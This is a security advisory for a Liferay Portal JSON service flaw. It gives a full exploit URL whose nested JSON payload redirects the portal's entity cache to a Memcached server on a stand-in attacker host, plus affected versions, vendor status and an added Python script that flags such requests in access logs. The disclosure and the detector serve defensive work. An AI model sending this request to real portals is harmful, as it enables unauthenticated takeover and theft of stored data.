Specially crafted JSON service request allows full control over a Liferay portal instance

Description:

Liferay Portal is an enterprise portal written in Java.

With a single HTTP request, you can reconfigure Liferay to use a remote Memcached cache instead of its own cache.

http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}}}}}

This means that all entities stored in the database will now be cached in a Memcached instance hosted on the attacker's host, where they can be retrieved or manipulated at will by the attacker. A moderately skilled attacker could leverage this to gain administrative access to the system. The attacker does not need to have an account on the portal in order to execute this attack.

Proof of concept:

Code demonstrating the vulnerability can be found at https://github.com/jelmerk/LPS-26558-proof

Systems affected:

Liferay 6.1 ce is confirmed to be vulnerable
Liferay 6 ee service pack 2 is most likely vulnerable
Liferay 6.1 ee is most likely vulnerable

Vendor status:

Liferay was notified April 6 2012 by filing a bug in their public bugtracker under issue number LPS-26558. The issue has since been flagged as private and has been resolved.
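
A log check for the request shape described above, as an added example that is not part of the original advisory or of Liferay's code: it flags json_service requests in which a parameter value is a JSON object naming a "class" at any nesting depth. The log lines are constructed, and the check assumes parameters arrive in the query string, so request bodies that an access log does not record are out of its reach.

```python
import json
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines; client addresses and timestamps are placeholders.
BASE = ("/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil"
        "&serviceMethodName=updatePortrait&serviceParameters=%5B%22userId%22%2C%22bytes%22%5D&userId=1&bytes=")
NESTED = ("%7B%22class%22%3A%22com.liferay.portal.kernel.dao.orm.EntityCacheUtil%22%2C%22entityCache%22"
          "%3A%7B%22class%22%3A%22com.liferay.portal.dao.orm.common.EntityCacheImpl%22%7D%7D")
SAMPLE_LOG = [
    f'198.51.100.7 - - [06/Apr/2012:10:00:01 +0000] "GET {BASE}{NESTED} HTTP/1.1" 200 2',
    f'198.51.100.8 - - [06/Apr/2012:10:00:05 +0000] "GET {BASE}%5B1%2C2%2C3%5D HTTP/1.1" 200 2',
    '198.51.100.9 - - [06/Apr/2012:10:00:09 +0000] "GET /web/guest/home HTTP/1.1" 200 10432',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def class_names(node):
    """Yield every string stored under a "class" key, at any nesting depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "class" and isinstance(value, str):
                yield value
            else:
                yield from class_names(value)
    elif isinstance(node, list):
        for item in node:
            yield from class_names(item)

def inspect_line(line):
    """Return (parameter, [class names]) pairs for one access-log line."""
    match = REQUEST_RE.search(line)
    path, _, query = match.group(1).partition("?") if match else ("", "", "")
    if not path.endswith("/c/portal/json_service"):
        return []
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        try:
            parsed = json.loads(value)
        except (ValueError, RecursionError):
            continue  # plain scalar such as a service class name, or unparseable JSON
        names = list(class_names(parsed))
        if names:
            findings.append((name, names))
    return findings

def scan(lines):
    """Map 1-based line number to findings, for lines that have any."""
    return {n: found for n, line in enumerate(lines, 1) if (found := inspect_line(line))}
```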